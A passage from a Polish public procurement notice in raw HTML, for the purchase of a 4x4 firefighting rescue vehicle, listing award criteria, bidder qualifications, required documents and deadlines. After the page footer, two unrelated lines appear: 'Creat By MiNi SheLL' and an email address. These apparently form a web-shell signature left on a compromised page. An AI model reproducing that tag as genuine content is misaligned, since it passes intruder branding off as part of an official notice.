uzyska największą liczbę punktów w wyniku zsumowania punktów za ustalone kryteria oceny ofert zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużony okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w rozdziale VIII SWZ, oraz spełniają określone przez zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Pełnomocnik Zamawiającego nie stawia warunku w powyższym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Pełnomocnik Zamawiającego nie stawia warunku w powyższym zakresie,<br/>3) sytuacji ekonomicznej lub finansowej:<br/>warunek ten będzie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną co najmniej 500 000 zł (słownie: pięćset tysięcy złotych)<br/>brutto,<br/>4) zdolności technicznej lub zawodowej w zakresie doświadczenia:<br/>wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał<br/>należycie co najmniej jedną dostawę, polegającą na dostawie samochodu pożarniczego o<br/>wartości umowy co najmniej 500 000 zł (słownie: pięćset tysięcy złotych) brutto,<br/>3. Pełnomocnik Zamawiającego, w stosunku do wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub<br/>zawodowej – wymaga by co najmniej jeden z wykonawców spełniał warunek określony w<br/>punkcie 2 ppkt 4.<br/>4. Pełnomocnik Zamawiającego może na każdym etapie postępowania, uznać, że wykonawca<br/>nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów,w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>5. W przypadku, gdy podmiot trzeci, którego potencjałem wspiera się wykonawca realizował<br/>zamówienie, w zakres którego wchodziły dostawy określone w punkcie 2 ppkt 4 wspólnie z<br/>innym podmiotem, nie ubiegającym się o udzielenie zamówienia, Pełnomocnik Zamawiającego<br/>wymaga, aby podmiot trzeci udostępniający potencjał wykonawcy faktycznie uczestniczył w<br/>realizacji ww. zakresu dostaw;<br/>6. W przypadku, gdy zamówienie, w zakres którego wchodzą dostawy, o których mowa w<br/>punkcie 2 ppkt 4 były realizowane przez wykonawcę wspólnie z innym podmiotem, nie<br/>ubiegającym się o udzielenie zamówienia, Pełnomocnik Zamawiającego wymaga, aby<br/>wykonawca składający ofertę w niniejszym postępowaniu faktycznie uczestniczył w realizacji<br/>ww. zakresu dostaw.<br/>7. Jeżeli wykonawca lub podmiot trzeci, którego potencjałem wspiera się wykonawca realizował<br/>dostawy, zamawiający uzna dostawę, o której mowa w punkcie 2 ppkt 4 za spełniającą warunek,<br/>jeżeli dostawa ta będzie odpowiadała swoim zakresem i wartością wymogom określonym w<br/>punkcie 2 ppkt 4.<br/>8. Wszystkie osoby przewidziane do realizacji zamówienia muszą biegle posługiwać się<br/>językiem polskim. W przeciwnym wypadku wykonawca udostępni wystarczającą ilość tłumaczy,<br/>wykazujących znajomość języka technicznego w zakresie związanym z przedmiotem<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r., poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do<br/>udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>– załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art.125 ust.1 Pzp, w zakresie podstaw wykluczenia z postępowania, o których mowa w:<br/>a) art. 108 ust. 1 pkt 1 - 4 oraz pkt 6 Pzp,<br/>b) art. 109 ust. 1 pkt 4, 5 i 7 Pzp, - załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4)	wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których dostawy te zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - załącznik nr 5 do SWZ;<br/>5)	dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę określoną w rozdziale VII ust. 2 pkt 3 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Jeżeli wyk.ma siedzibę lub m.zam.poza teryt.RP,zamiast dok., o których mowa w ust. 4 pkt<br/>2,składa dok.lub dok.wystawione w kraju, w którym wyk.ma siedz.lub m.zam.,potwierdz.odpowiednio, że nie otwarto jego likwidacji ani nie ogł.upadłości. Wystaw. nie wcześniej niż6mies. przed upływem terminu skład.ofert.2.Jeżeli w kraju,w którym wyk. ma<br/>siedzibę lub miejsce zam., nie wydaje się dok.,o których mowa w ust. 4 pkt 2, zastępuje się je w<br/>całości lub części dok.zaw.odpow.oświad. wyk.,ze wskazaniem os. albo osób upr. do jego<br/>reprez.,złożone przed notar. lub przed org,sądowym,administr. albo org.samorządu zaw.lub<br/>gosp.właściwym ze względu na siedzibę lub miejsce zam.Wyk.3.Pełn.Zam. nie wzywa do złoż.<br/>podm.Śr.dow.,jeżeli może je uzyskać za pomocą bezpł.i ogólnodostęp.baz danych,w szczeg.rej.<br/>Publ. w rozumieniu ust.z dnia 17 lutego 2005 r. o inform.działaln.podm. realizujących zad. Publ.,<br/>o ile wyk.wskazał w ośw.,o którym mowa w art. 125 ust. 1 Pzp dane umożl.dostęp do tych<br/>środków;4.Wyk.nie jest zob.do złożenia podm. Śr.dow.które zam. posiada,jeżeli wyk. wskaże te<br/>środki oraz potwierdzi ich praw. i aktualn..5.W zakresie nieureg.Ust.Pzp lub niniejszą SWZ do<br/>oświ.i dok.skł.przez wyk.w postęp.zastosowanie mają w szczeg.przepisy rozp.Ministra Rozwoju<br/>Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podm.śr.dow.oraz innych dok. lub<br/>ośw.,jakich może żądać zam.od wyk. oraz rozp. Prez.Rady Min.z dnia 30 grudnia 2020 r.w<br/>sprawie spos. Sporządz.i przekaz.inform.oraz wymagań techn. dla dok.Elektr.oraz<br/>śr.komunik.elektron.w postęp.o udzielenie zam. Publ.lub konk.6. Of. musi zaw.następujące ośw.<br/>i dok.:1)form.Of.wraz z wymaganymi zał.,sporządzony wg wzoru for. Of. Stan.zał.nr 1 do SWZ.<br/>W przypadku złożenia of.na innym for.niż zał. nr 1 do SWZ, powinien on zawierać wszystkie<br/>wymagane inf.określ. w tym zał. Dok. nie podlega uzup; 2)Wymag.techn. dla śr.sam.ratown.-<br/>gaśnicz.z napędem 4x4” sporz.wg wzoru stanowiącego załącznik nr 8 do SWZ. W przypadku<br/>złożenia ww. wymagań na in.form.niż załącznik nr 8 do SWZ, dokument ten winien zawierać<br/>wszystkie wymagane inform. określone w tym załączniku. Dokument „Wymag.techn.dla śr.sam.<br/>ratown.-gaśn.z napędem 4x4” nie podlega uzupełnieniu. 3)aktualne na dzień składania ofert<br/>ośw.o spełnianiu warunków<br/>udziału w postęp.oraz o braku podst.do wykl.z postęp.,o którym mowa w art. 125 ust. 1 Pzp –<br/>zgodnie z zał.nr 2 do SWZ. Ośw.składają odrębnie: Wyk./każdy spośród wyk.wspólnie<br/>ubiegających się o udzielenie zam.W takim przypadku ośw.potwierdza brak podstaw<br/>wykluczenia Wyk.oraz spełnianie warunków udziału w post.w zakresie, w jakim każdy z<br/>wyk.wykazuje spełnianie war. udziału w post.4)Aktualne na dzień składania ofert ośw.o braku<br/>podstaw do wykluczenia z postępowania oraz spełnianiu warunków udziału w postępowaniu,<br/>zgodnie z zał.nr 2a do SWZ(wyp.podmiot trzeci- załączyć w przypadku poleganiu na<br/>zdolnościach podm.udostęp.zasoby). Wyk., w przypadku polegania na zdoln.lub sytuacji<br/>podm.udostępn.zasoby, przedstawia, wraz z ośw., o którym mowa w art.125 ust. 1 ustawy Pzp<br/>także ośw.podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykl.tego<br/>podm.oraz odpowiednio spełnianie warunków udziału w postęp.lub kryt.selekcji, w zakresie, w<br/>jakim wyk.powołuje się na jego zasoby.5)Pisemne zobowiązanie podm.do oddania do dys.niezb.<br/>zasobów na potrzeby wyk. zamów., podpisane przez upr.przedstaw.tych<br/>podm.,wg zał.nr 3 do SWZ (wypełnia podm.trzeci- załączyć w przypadku poleganiu na<br/>zdolnościach podm.udostępn.zasoby).Wyk., który polega na zdolnościach lub sytuacji<br/>podm.udostępn.zasoby, składa, wraz z ofertą, zobowiązanie podm. Udostępn.zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zam. lub inny<br/>podm.środek dow.potwierdzający, że wyk.realizując zam., będzie dysponował niezbędnymi<br/>zasobami tych podm.6)Pełnom. dla osoby reprezentującej wyk.,o ile nie wynika to z<br/>in.dok.złożonych przez wyk. W przypadku skł.of.wspólnej należy załączyć pełnomocnictwo dla<br/>podmiotu reprezentującego kilku wyk. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w rozdziale IX ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, jaki zakres zamówienia wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznego na warunkach określonych we wzorze umowy, stanowiącym załącznik nr 7 do SWZ.<br/>2. Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym we wzorze umowy,<br/>stanowiącym załącznik nr 7 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-06 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com